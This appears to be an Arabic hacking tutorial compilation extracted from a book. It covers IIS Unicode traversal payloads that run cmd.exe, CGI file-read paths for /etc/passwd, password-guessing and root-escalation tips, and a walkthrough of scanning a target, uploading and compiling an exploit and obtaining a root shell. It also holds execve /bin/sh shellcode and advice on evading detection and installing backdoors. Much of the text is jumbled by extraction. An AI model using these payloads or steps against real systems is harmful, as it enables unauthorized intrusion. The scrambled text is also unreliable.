‫‪\:%255cwinnt/system32/cmd.exe?/c+dir+c‬‬

‫‪235‬‬

adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
UONICODE ‫حاولت قد المستطاع انى أشكل فى أنواع‬
‫ هذه مثال عليها‬CGI ‫أما بالنسبة الى ثغرات الـ‬
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
‫هذه وباقى العديد من الثغرات يعنى ل يقتصر المر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام‬
‫التشغيل‬
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD
،،،‫انتهى‬

236

‫"استغلل لينكس في اختراق المواقع "‬
‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬
‫>ةةةةةة‪<Black_sNiper :‬‬
‫هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه‪...‬‬
‫سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في‬
‫الدخول على النظام‪..‬‬
‫أول يجب ان تعرف بأنه يمكن ان تدخل على بعض النظمة باستخدام بعض الكلمات المشهورة وتوجد بعض‬
‫النظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الوامر هي ‪.:‬‬

‫‪who‬‬
‫‪rwho‬‬
‫‪finger‬‬

‫‪237‬‬

‫وتستفيد من هذه الوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من‬
‫نفس السم وذلك لن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لسمه مثل ‪.:‬‬
‫‪username : Black‬‬
‫‪password : Black2‬‬
‫وفي بعض النظمة تستطيع الدخول بكتابة ‪ test‬أو ‪demo‬‬
‫من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام ‪.:‬‬
‫‪etc/passwd/‬‬
‫‪etc/group/‬‬
‫‪etc/hosts/‬‬
‫‪usr/adm/sulog/‬‬
‫‪usr/adm/loginlog/‬‬
‫‪usr/adm/errlog/‬‬
‫‪usr/adm/culog/‬‬
‫‪usr/mail/‬‬
‫‪usr/lib/cron/crontabs /‬‬
‫‪etc/shadow/‬‬
‫الحساب ‪.: bin‬‬
‫وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا‬
‫كان كذلك فيمكن‬
‫)أحيانا( اضافة كلمة سر خاصة بك وتضيف حساب دخول )روت( لك !!‬
‫والطريقة بسهولة كالتالي ‪.:‬‬
‫‪$ ed passwd‬‬
‫وأخيرا تقول ‪ exec login‬وتكتب أي اسم وبذلك تكون انت مدير النظام!!‬
‫ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!!‬
‫عند دخولك الى النظام ستقابل احدى هذه الحتمالت ‪.:‬‬
‫اما انك استطعت الحصول على حساب مدير النظام )الروت( أو انك حصلت على حساب مستخدم آخر‪..‬‬
‫في البداية تكتب المر التالي ‪.:‬‬
‫‪$ pwd‬‬
‫والنتيجة تظهر ‪.:‬‬
‫‪$ /usr/admin‬‬
‫النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود‪..‬‬
‫اذا ظهرت نتيجة غير تلك النتيجة ‪ ..‬فمثل ‪:‬‬
‫‪$ /usr/Black‬‬
‫فهذا يدل على انك دخلت على حساب هذا المستخدم!!‬
‫ولعرض ملفات هذا المستخدم تكتب التي ‪.:‬‬
‫‪$ ls /usr/Black‬‬
‫وسوف يعرض لك ملفات هذا المستخدم ‪.:‬‬
‫‪mail‬‬
‫‪pers‬‬
‫‪games‬‬
‫‪bin‬‬
‫ولكن هذا لن يعرض ملف ‪profile.‬‬
‫ولكي تستعرضه تكتب التي ‪.:‬‬
‫‪$ cd‬‬

‫‪238‬‬

:‬‬ ‫‪$ passwd‬‬ ‫ثم سيطلب منك كلمة السر القديمة وهي طبعا معك!! وتدخل كلمة السر الجديدة ‪.:‬‬ ‫‪$ cat letter‬‬ ‫وهذا اذا افترضنا ان الملف المطلوب هو ‪letter‬‬ ‫اذا اردت تغيير كلمة السر فما عليك ال ان تكتب ‪..:‬‬ ‫‪$ write‬‬ ‫ولمعرفة من يوجد على النظام نكتب التي ‪.:‬‬ ‫‪$ grep phone Black‬‬ ‫وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم الخر‬ ‫ولعمل نسخ من ملف الى ملف آخر تكتب التي ‪.:‬‬ ‫‪:Black:chips11.43:34:3:Mr doooom:/usr/Black‬‬ ‫وهذا يعني انه يمكن للمستخدم الحتفاظ بكلمة السر لمدة ثلثة اسابيع بدون تغيير وانه يجب ان يغيرها كل‬ ‫ستة اسابيع ‪.:‬‬ ‫‪$ cat /etc/passwd‬‬ ‫‪:/:root:F943/sys34:0:1:0000‬‬ ‫‪sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh‬‬ ‫‪checkfsys:Locked.:‬‬ ‫‪$ who‬‬ ‫‪safadM tty1 april 19 2:30‬‬ ‫‪paul tty2 april 19 2:19‬‬ ‫‪gopher tty3 april 19 2:31‬‬ ‫واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام‬ ‫حساب المدير نفسه ‪ .‬‬ ‫للبحث عن معلومة معينة تكتب المر التالي ‪.‬ولستعراض ملف كلمات السر نكتب ‪.root‬‬ ‫‪:bluebox::70‬‬ ‫‪239‬‬ .:0:0:check file system:/usr/admin:/bin/rsh‬‬ ‫وقد يظهر حساب آخر للمدير كالتالي ‪.:‬‬ ‫‪$ cp letter letters‬‬ ‫اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب المر التالي ‪.:‬‬ ‫‪$ ls /etc/group‬‬ ‫‪root::0:root‬‬ ‫‪adm::2:adm...‬‬ ‫‪$‬‬ ‫اذا اردت قراءة محتويات ملف فسوف تكتب المر التالي ‪.‬‬ ‫استعراض ملف المجموعة كالتالي ‪.‫‪$ ls -a‬‬ ‫‪:‬‬ ‫‪:‬‬ ‫‪profile.

‬‬ ‫‪240‬‬ .‬‬ ‫انتهى‪،،،‬‬ ‫" شرح مفصل من اللف إلى الياء في احتراف اختراق‬ ‫المواقع عن طريق لينكس "‬ ‫>منقول<‬ ‫>الكاتب‪ :‬ايسر <‬ ‫‪UNix Usage IN HackinG‬‬ ‫اهل بكم جميعا‬ ‫في البدايه احب ان انوه ان هناك العديد من الدروس الجميله فعل ‪ .‫ويمكن ان يحتوي ملف المجموعة على كلمات سر أو ليحتوي !!‬ ‫اذا كان ليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم‬ ‫عادي وليس كمدير للنظام وذلك بعدة طرق ‪.. servers ..... superuser‬‬ ‫و هو الدمين او المدير على النظام‪. root‬و هو يكون ‪. supercomputers‬و غيرها‬ ‫كلمه ‪BOX‬‬ ‫النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ‪...‬و لكنها قديمه و ليست ‪up to date‬‬ ‫لذلك اكتب لكم هذاالدرس المطول لكي يكون مكانا للمبتدئين يمكن ان يستفيدوا منه‬ ‫و اتمنى فعل ان يحوز على اعجابكم ‪(:‬‬ ‫بعض المصطلحات الهامه ‪:‬‬‫كثير من الناس يحبون ان يطلقوا على كل من ال ‪ pc ..‬بالضافه لليوزرز‬ ‫تسطيع ان تطلق على الرئيس هناك كلمه ‪ .

.‬‬ ‫اذن يجب ان تبحر الى النترنت من نظام اليونيكس ‪ ....‬يجب ان تكون ملما بنظام التشغيل هذا‪...‬مجاني ‪ ..‬ذه فلسفه محترمه ‪..‬ماذا ‪ ..‬لن اساسا يجب ان تعرف المودم بتاعك على اللينكس‬ ‫حسب التوزيعه اللي عندك ‪ .‬‬ ‫ النترنت‬‫‪ ...‬للينكس مميزات كثيره ‪..‬‬ ‫ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا‬ ‫لتسليمك نسخه من الماندريك ‪ 9‬او الريد هات ‪ ) 7.‬دعنا نبحر على النترنت ‪(:‬‬ ‫انا عارف انك حصلت على الدرس ده من النترنت ‪ .‬‬ ‫بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه ‪(:‬‬ ‫اوكي ‪. u...‬تريد ان تخترق اجهزه مبحره في النترنت ‪..‬لذا فيمكنك تجاهله الن ‪(:‬‬ ‫اما المجاني فيوجد منه عده عائلت‬ ‫‪BSD‬‬‫و هي القدم و الصعب في الستعمال ‪ ..‬يمكنك تطويره ليلئم امكانيات جهازك ‪.‬‬ ‫اوكي ‪ ..‬و هو طبعا غني عن التعريف‬ ‫طبعا ‪ .‬فهو منقسم الي قسمين ‪:‬‬ ‫‪ -1‬يونيكس تجاري ‪ ).‬حاول تعرف المودم ‪ .‬و لماذا ل يصلح الويندوز؟؟‬ ‫لسبيبن ‪:‬‬ ‫‪-1‬النترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ‪.‬تريد ان تخترق جهازك ام ماذا ؟؟‬ ‫اه‪.. windows‬ارجوك ل تلوم اللينكس ‪.‬‬ ‫خلص ‪ .....s. winmodems‬‬ ‫لماذا لنها مصممه اساسا للعمل تحت نظام التشغيل ‪ ...‬يوجد منه العديد من التوزيعات و ان كان افضلها هي ‪ ) SuSe‬لم اجربها و لكن اسمع الكثير من‬ ‫الناس يشكرون في هذه التوزيعه (‬ ‫اما بالنسبه لسهل توزيه فهي ‪ MDK‬و قد و ضعت هنا بعض الدروس الخاصه بالمندريك‬ ‫يمكنك تحميلها و قرائتها ‪.‬امن ‪ ..‬‬ ‫لذا من الفضل انك تركبه في جهازك ‪. robotics‬‬ ‫يجب ان تتاكد ان المودم يكون ‪ serial‬و ليس ‪USB‬‬ ‫على اي حال خلينا في موضوعنا‪..‬ادخل على النترنت من خلل ال ‪ isp‬وذلك من خلل نظام الليونيكس ‪(:‬‬ ‫‪241‬‬ ..2‬ثمن السطوانات البلنك و النسخ فقط (‬ ‫على اي حال ‪ .....‬معظم اادوات و اكواد الكسبلويتات مصممه للعمل في بيئه اليونيكس ‪......‬انت انسان لينكسي ‪ ...‬اذن ‪..‬و من الفضل لك ال تستعملها ال اذا كنت ترغب في تركيب سيرفير‬ ‫على الجهاز‬ ‫‪.‬ما هي توزيعات اليونيكس ؟؟و اللينكس ؟؟‬ ‫بالنسبه لليونيكس ‪ .....‬جميل جميل ‪ ...‬السؤال هو لماذا هذه النظمه بالذات ‪ .‬‬ ‫‪-2‬طبعا ‪ .‬مستقر ‪ ...‬و نادر لما تلقي جهاز شغال على الويندوز ‪nt .‬يوجد العديد من المودمز الخارجيه مثل ‪acorp .‬‬ ‫يوجد اللينكس ‪.‬‬ ‫حسنا ‪ .‬‬ ‫فكل المودمات الداخليه ‪ internal‬يطلقون عليها ‪... windows‬بل تحتاج الى اي نظام مشتق من نظام‬ ‫التشغيل اليونيكس ‪...‬حتلقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟‬ ‫ما هذا ‪ .‬غير مجاني (‬ ‫‪ -2‬يونيكس مفتوح المصدر و مجاني ‪open source‬‬ ‫بالنسبه لليونيكس التجاري ل يمكن ان تركبه على جهازك العادي ‪.‬‬ ‫‪9x‬‬ ‫اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ‪.‬ل يمكنك ان تخترق باستخدام نظام التشغيل ‪ .‬لكن هذا كان عن طريق الويندوز‬ ‫‪ .‬تريد ان تخترق ‪......‬لكن انت اليوم انسان مختلف‪ ...‬ل تتعجب ‪.‬اما بالنسبه للمودم الخارجي ‪ external‬فهو مودم حقيقي ‪real or true modems‬‬ ‫‪ ..‫بالنسبه لنظمه التشغيل ‪:‬‬ ‫طبعا ‪ .

.‬الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ‪.‬ت‬ ‫‪ -2‬اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ‪..‬لكي يقوم‬ ‫الديمون هذا من خلله بتقديم الخدمه الملعونه =‪D‬‬ ‫و هذه بعض الخدمات مع البورتات الخاصه بهم ‪..‬‬ ‫طيب ‪ .‬‬ ‫‪ -5‬هذه النقطه تعتمد على بعض تقنيات الفريكينج ‪ .‬‬ ‫و هذا الخدمه ‪ service‬تكون مستضافه من خلل ديمون ‪daemon or server‬‬ ‫اذن ‪ .‬انه يعتمد على بروتوكول يدعى‬ ‫‪TCP\IP‬‬ ‫و بعض البروتوكولت الخرى ‪.‬انت فهمتني غلط ‪ .‬ركز معايا ابوس ايدك =‪D‬‬ ‫المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ‪.. telnet .‬مش قصدي يعني تروح لنت‬ ‫كافيه ‪(:‬‬ ‫جهازك =====< الجهاز الضحيه ‪ .html‬واوامر اخرى كثيره ‪....host..‬‬ ‫‪ -4‬حاول ان ل تخترق اجهزه خطيره و مهمه مثل ‪ gov ..‬‬ ‫‪REdirecting‬‬ ‫فحص المواقع ومنافذ ال ‪: TCP‬‬‫يجب عليك قبل ان تقوم بالختراق ان تعرف كيف يمشي النترنت ‪ ..‬لكن‬ ‫جهازك======< جهاز وسيط======< السيرفير الضحيه ‪..‬ده ممكن يكون مثل جهاز مخترق من قبل او شيل اكاونت ‪.net‬ماالذي يحدث ؟؟‬ ‫يقوم المتصفح بالتصال بالموقع من خلل بورت ال ‪ TCP‬رقم ‪80‬‬ ‫ثم يقوم بارسال المر‬ ‫‪ GET /HTTP/1..‬او سيرفيرات اجب عليك قبل ان ‪ edu.html‬‬ ‫‪242‬‬ ..‬ده كده كويس اوي‬ ‫طيب ايه الجهاز الوسيط ده‪ ..‬لكن طبعا هناك كثيير‬ ‫‪FTPd‬‬ ‫‪FTP‬‬ ‫‪21‬‬ ‫‪telnetd Telnet‬‬ ‫‪23‬‬ ‫‪(!sendmail (yes‬‬ ‫‪SMTP‬‬ ‫‪25‬‬ ‫‪apache‬‬ ‫‪HTTP‬‬ ‫‪80‬‬ ‫‪qpop‬‬ ‫‪POP3‬‬ ‫‪110‬‬ ‫حرف ‪ d‬في اخر كلمه ‪ ftp ..etc‬اختصار لكلمه ‪daemon‬‬ ‫مثال ‪ :‬لو سيادتك قمت بزياره هذا العنوان من خلل المتصفح مثل ‪ www.‬هذه البورتات المفتوحه ) المفتوحه فقط ( تكون على استعدد دائما لتلقي الداتا من‬ ‫ريموت بوكس‬ ‫دائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه ‪<< service.‬و ل حتى باسامي مزوره لن هذا قد يجعلك عرضه‬ ‫لكشف الي بي الخاص بك‬ ‫و من ثم ال ‪ isp‬ثم رقم هاتفك و صباح الفل ‪..‬لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك ‪...‬هذا البورتات يمكنك ان تقوم من خللها‬ ‫بارسال الداتا‬ ‫من جهاز الى ذلك الجهاز ‪.‬و يوجد العديد ممن يقدمون هذا الحدمه مجانا ‪.....‬‬ ‫و طبعا هنك و سائل عديده لذلك لن اتطرق اليها لن هناك العديد من الشروح المتميزه في مجال الحمايه‬ ‫وازاله الثر‬ ‫الخصهم في نقطتين او ثلثه ‪:‬‬ ‫‪-1‬ايك ان تحاول ان تسجل في موقع تحاول اختراقه ‪ ...‬‬ ‫طيب ماهو الشيل اكاونت‪ :‬هو عباره عن خدمه حيث يمكنك من خللها التحكم في جهاز من بعيد و هذا‬ ‫الجهاز عليه نظام اليونيكس‬ ‫طبعا من غير ان تقوم باختراق هذا الجهاز ‪.mil...‫اهم حاجه قبل الشروع في الختراق هي ان تحاول ال يتم اليقاع بك و كشف محاولتك لختراق سيريفير‬ ‫معين ‪...1 /index.....‬‬ ‫ثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه ‪index..‬ده مش مامون ‪.‬ل ل ‪ .‬و‬ ‫غيرها من هذا النمط‪.‬‬ ‫‪-3‬احاول ال تخترق دائم من خلل جهازك ‪ .

‬صحيح ان التلنت هوه خدمه ‪...xx‬‬ ‫)‪The 1518 ports scanned but not shown below are in state:‬‬ ‫‪(closed‬‬ ‫‪Port‬‬ ‫‪State‬‬ ‫‪Service‬‬ ‫‪tcp open‬‬ ‫‪ftp/21‬‬ ‫‪tcp open‬‬ ‫‪telnet/23‬‬ ‫‪tcp open‬‬ ‫‪smtp/25‬‬ ‫‪tcp open‬‬ ‫‪http/80‬‬ ‫‪tcp open‬‬ ‫‪pop3/110‬‬ ‫‪Nmap run completed -.‬اه ‪ .. 2..53 by fyodor@insecure.xx.i386....edu‬‬ ‫‪.lycos.edu‬كمثال لموقع‬ ‫مستهدف ‪.Trying xx.edu‬‬ ‫لكن يلزمنا اداه معينه للتصال بالموقع من احد هذا المنافذ ‪. port scaners‬السكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدف‬ ‫من خلل جميع المنافذ ‪.03$ rpm -i nmap-2.‬بالنسبه للينكس يمكننا ان نحصل على نسخه ‪ nmap‬على هيئه ‪rpm‬‬ ‫و لتركيبها اتبع التالي ‪:‬‬ ‫‪bash-2.‬و هوه ده اللي احنا محتاجينه‬ ‫=<‬ ‫اذن لكي تقوم باختراق موقع يجب ان تعرف اي ال ‪ daemons‬الموجوده عل السيرفير لذلك يجب عليك‬ ‫ان تعرف‬ ‫ماهي المنافذ المفتوحه في السيرفير المستهدف ‪.org/nmap‬‬ ‫‪:(Interesting ports on target.xx‬‬ ‫‪.‫الشيء الطريف ان ال ‪ daemons‬دي مليئه بالثغرات المنيه الخطيره ‪..edu (xx.53-1.uk/linuxdude/e3sar‬‬ ‫طيب‪.xx.insecure.‬؟؟‬ ‫احنا مش اتفقنا ننسى الويندوز ده خالص =>‬ ‫‪/http://members..co..org‬‬ ‫‪( /( www.‬من خلل التلنت ديمون ‪ . TCP‬تعال نشوف مثال ‪:‬‬ ‫‪bash-2.‬‬ ‫من خلل ما ال ‪ .03$ nmap -sS target.‬فكر معي ماهي هذه الداه؟؟؟‬ ‫نعم انها التلنت ‪ .target..xx...xx.Connected to target.‬و ان شاء ال سنحاول على مدار الدرس باستخدم الموقع ‪ target.‬و لكنه ايضا عباره عن‬ ‫برنامج بسيط ‪.‬يمكنك من خلله التصال باي موقع بمنفذ معين من خلل ال ‪..‬اشهر هذا السكانرز هي الداه ‪ nmap‬بواسطه ‪ fyodor‬و لحسن الحظ يوجد نسخه‬ ‫منها خاصه بالويندوز و ‪ !!.rpm‬‬ ‫ثم نقوم بالتشغيل ‪ .....6) ready 220‬‬ ‫‪243‬‬ .'[^' Escape character is‬‬ ‫‪.‬ايه ده ‪.edu 21‬‬ ‫‪...‬اذن كيف تحصل عى المعلومات هذه ‪.edu‬‬ ‫‪Starting nmap V....‬‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2...‬و ذلك لمعرفه اي البورتات المفتوحه‬ ‫في هذا السيرفير ‪.edu FTP server (SunOS 5.03$ telnet target.1 IP address (1 host up) scanned in 34‬‬ ‫‪seconds‬‬ ‫اذن لقد قام ال ‪ nmap‬بعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!‬ ‫اذن يمكننا ان نعرف ايضا اي الخدمات و ال ‪ daemons‬الموجوده في الموقع ‪target.

2.3 ‫طيب لماذا نحتج الى هذا المعلومات ؟؟ لن الكسبلويت و الثغره الموجوده دائما تعتمد على‬.11..xx.0/8.xx.0.edu Starting nmap V.0/8.'[^' Escape character is target.122 .03$ nmap -sS target.0 221 .14 Nmap run completed -.Goodbye 221 Connection closed by foreign host ‫اهااااا‬ (: ‫دول دلونا على معلومات قيمه اوي اوي‬ SunOS 5.Trying xx. 24 Sep 2000 220 09:18:14 -0 (EDT) 400 quit target.xx.edu closing connection 2..Connected to target. 2.9.quit ..1 IP address (1 host up) scanned in 34 seconds 244 .53 by fyodor@insecure.6 ‫ نظام التشغيل هناك هو‬-1 sunOS ‫ اللي بييجي مع نظم السن‬standard ‫ ديمون الف تي بي هناك هو ال‬-2 : ‫تعال نجرب بورت تاني نتصل بيه من التلنت‬ bash-2.org ( /( www.insecure.edu 25 .edu .03$ telnet target.edu ESMTP Sendmail 8.xx The 1518 ports scanned but not shown below are in state:) (closed Port State Service tcp open ftp/21 tcp open telnet/23 tcp open smtp/25 tcp open http/80 tcp open pop3/110 TCP Sequence Prediction: Class=random positive increments (!Difficulty=937544 (Good luck Remote operating system guess: Linux 2.xx .org/nmap :(Interesting ports on target.xx.3.1.2.Connection closed by foreign host ‫ و ان اصدار ه هو‬sendmail ‫ هو ال‬smtp ‫ايضا استفدنا معلومات قيمه هي ان ديمون‬ 8.11.edu (xx. Sun. ‫ الموجود و على نظام التشغيل‬daemon ‫ال‬ ‫تكون مزوره او غير صحيحه‬ : ‫ازاي ؟؟؟تابع معايا كده‬ nmap ‫بالداه‬ bash-2.9. ‫جميل حميل‬ ‫لكن توجد مشكله وهي ان بعض المكعلومات قد يمكن ان‬..

6) ready 220‬‬ ‫‪Name: luser‬‬ ‫‪.com‬‬ ‫‪Connected to shell.shell.c -o program‬‬ ‫‪sh-2.‬كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد الدمينز لو عرف ان اننا قمنا بفحص‬ ‫موقعه ‪ ..03$ vi exploit.‬و دي موجوده بكثره على النترنت‬ ‫‪245‬‬ .‬لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و‬ ‫ممكن تمشي‬ ‫طيب ‪..User luser logged in 230‬‬ ‫‪ftp> put program.‫يانهار اسود ‪|:‬‬ ‫نظام التشغيل اللي الده قامت بتخمينه هو لينكس !!!!!!‬ ‫مش كان ‪ !!!!!! sunOS‬اه يا و لد الكلب =@‬ ‫بس احنا برده لزم نعرف توزيعه اللينكس الوجوده ‪./program‬‬ ‫ملحوظه ‪ :‬عيب اوي انك تاخد المرين دول كقاعده مسلم بيها‪ .03$ ftp shell.c‬‬ ‫‪sh-2.com FTP server (SunOS 5.03$ ls‬‬ ‫‪program.03$ .57982 150‬‬ ‫‪.PORT command successful 200‬‬ ‫‪..18.c‬‬ ‫ثم انسخ الكود ثم افتح تيرمينال تاني و اتصل بالشيل و الصق الكود في ملف و سميه بامتداد‪c.‬‬ ‫)هذه الخطوه اذا كن عندك شيل اكاونت و مش عايز تخترق من جهازك (‬ ‫اتبع التالي ‪:‬‬ ‫‪bash-2..c (204.03$ man nmap‬‬ ‫رفع ادواتك على شل اكونت ‪..‬‬ ‫وكومبايل للكسبلويت و بعدين اعملها رن على الهوست المستهدف‬ ‫‪sh-2.‬‬ ‫كده انت رفعت الكسبلويت بتاعتك للشيل اكاونت ‪.42.253. usage‬‬ ‫ استغلل الثغرات المختلفه ‪-:‬‬‫هذا اهم جزا في الموضوع ‪.Transfer complete 226‬‬ ‫‪ftp> quit‬‬ ‫‪Goodbye 221‬‬ ‫طبعا هذه الطريقه ن خلل ا ‪ftp‬‬ ‫و هي غير محببه لنها تقوم بعمل ملفات اللوج لذلك يفضل لك ان تقوم بنسح سورس كود الكسبلويت و‬ ‫لصقها في ملف في الشيل ‪..03$ gcc program.‬‬ ‫‪sh-2.‬كل اكسبلود و له اوامره الخاصه في‬ ‫الكومبايل و له طريقه في التشغيل‬ ‫تظهر هذا الطريقه في التعليق البرمجي او في ال ‪.‬بمجرد ان تعرف ماهو نظام التشغيل عند الموقع المستهدف و ايضا الديمونز‬ ‫الشغاله على السيرفير‬ ‫فيمكنك ان تذهب الى اي دتا بيز اللي بتقدم اكسبلويت ‪.‬اعتقد نه حيكون زعلن منن و حنا مش عايزين الدمين يزعل مننا لذلك‬ ‫استخدمنا الختيار ‪ Ss-‬على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ل مشاكل فيه =‪D‬‬ ‫لمزيد من المعلومات راجع‪:‬‬ ‫‪bash-2.(ASCII data connection for program..Password required for luser 331‬‬ ‫‪:Password‬‬ ‫‪.c‬‬ ‫‪.com‬‬ ‫‪.

..co.‬لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير‬ ‫لو شوفنا كود اكسبلويت معينه ممكن نلقي ده‬ ‫‪= []char shellcode‬‬ ‫"\‪xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b‬‬ ‫"‬ ‫"\‬ ‫‪"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd‬‬ ‫"\‪.pharaonics.org/sploits..‬‬ ‫زي ما قلت يجب عليك البا انك متستعملش جهازك في الختراق ‪ .‬يقوم هذه الكسبلويت بعمل ) دربكه في الديمون (‬ ‫مم يؤدي الى تشغيل الكود الذي تريده‬ ‫يقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود ‪shell code‬‬ ‫طبعا يختلف هذا الكود تبعا لنظام التشغيل ‪ ..'[^' Escape character is‬‬ ‫‪Welcome to yourshellaccount‬‬ ‫‪login: malicioususer‬‬ ‫‪(Password: (it doesn't display‬‬ ‫‪246‬‬ .‬ماهي الكسبلويت ؟؟‬ ‫الكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان‬ ‫الكسبلويت دي تقوم باستغلل منطقه معينه في السيرفير ‪...0‬او اي ديمون اخر‬ ‫على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض للختراق ‪..html‬‬ ‫‪..‬ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس‬ ‫دتا بيز صغيره للكسبلويتات هي ‪www.11..‬‬ ‫تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ‪.‬دهه للينكس و يقوم بتشغيل الشيل اللي في المسار دهه ‪bin/sh/‬‬ ‫طبعا لو السيرفير بتاعك شغال على نظام تشغيل اخر اذن يجب عليك ان تغير الشيل كود‬ ‫ده الى اخر يناسب النظام المستهدف ‪...xx.‬‬ ‫طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصلحيات و ممكن تعمل كل اللي انت‬ ‫عايزه ‪.....‬‬ ‫من اسهل و اشهر الكسبلويتات هي البفر اوفر فلو ‪ .‬اول حاجه شيل عادي ‪..‬طريقه لدخول الى الشيل اكاونت كالتالي‬ ‫‪bash-2..‬مقسمه الى ديمونات و نظم تشغيل‬ ‫و لكن ‪.linux..xx‬‬ ‫‪..Trying xx.com.‬ان لما تشغل اكسبلويت على سيرفير معين ‪.net/less/NEtworks/124.EDU‬‬ ‫يمكننا ان نستخدم الكسبلويت الخاصه ب ‪ sendmail 8..‬في حاله ‪TARGET.cn/hack.‬ايه الفوائد اللي جتعود عليك )غير طبعا‬ ‫اختراق الموقع (‬ ‫حتحصل على حاجتين اتنين ‪.com :‬‬ ‫‪www.za‬‬ ‫مثل ده فيه كل حاجه ممكن تتخيله ‪.htm‬‬ ‫فيه حاجه لزم تعرفها ‪.‫‪http://www.‬مش عارف ايه السند‬ ‫ميل اساسا ؟؟‬ ‫طيب رووح للدرس ده و نت تعرف ‪:‬‬ ‫‪http://www..‬‬ ‫‪.03$ telnet myshellaccount 23‬‬ ‫‪..insecure.xx.‬طبعا ممكن تلقي شيل كودس لجميع نظم التشغيل في مواقع‬ ‫السيكيورتي المختلفه‪.securityfocus."x80\xe8\xdc\xff\xff\xff/bin/sh‬‬ ‫اها‪..‬طيب زي ما قلت ان كل اكسبلويت مختلفه عن الخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذا‬ ‫كنت ل تفهم في لغه البرمجه ‪..‬و انما تستخدم جهازا وسيطا او شيل‬ ‫اكاونت ‪.Connected to yourshellaccount‬‬ ‫‪.

.‬معنها اننا اخدنا شيل هناك‬ ‫تعال نشوف وضعنا ايه على السيرفير ‪:‬‬ ‫‪whoami$‬‬ ‫‪root‬‬ ‫يا عيني ‪.‬صعب ان النورتون يكشفه و ممك‪.‬‬ ‫اذن حنعمل ايه دلوقتي؟؟‬ ‫في حاجه ‪.com ...‬‬ ‫‪ -1‬ازاي تعمل ‪sushi‬؟؟؟؟‬ ‫‪247‬‬ .‬تذكر الثلث اجهزه اياهم‬ ‫جهازك‪ <-----‬جهاز وسيط‪ <------‬الجهاز المستهدف ‪.‬اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك في‬ ‫اي وقت ‪..c‬‬ ‫و هي تعمل بفر اوفر فلو ‪ .‬‬ ‫لكن هذا بصراحه و من غير زعل ‪.‫‪..03$ gcc exploit.‬ده شغل اللمرز لن عيب اوي انك تفرد عضلتك على موقع ‪edu.‬‬ ‫طبعا الباك دورز في موضوعي ده تختلف تماما عن الكلم الفاضي ده و ل مؤاخذه‬ ‫طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا ‪ .‬اه =| =|‬ ‫ايه الكلم ده ياد يا ايسر ؟؟؟؟‬ ‫هاك اتاك =| !!!!!!‬ ‫اسف نسيت ‪(= ..‬تذكر ن تحاول ان تتجنب رفع الكسبلويتات بالف تي 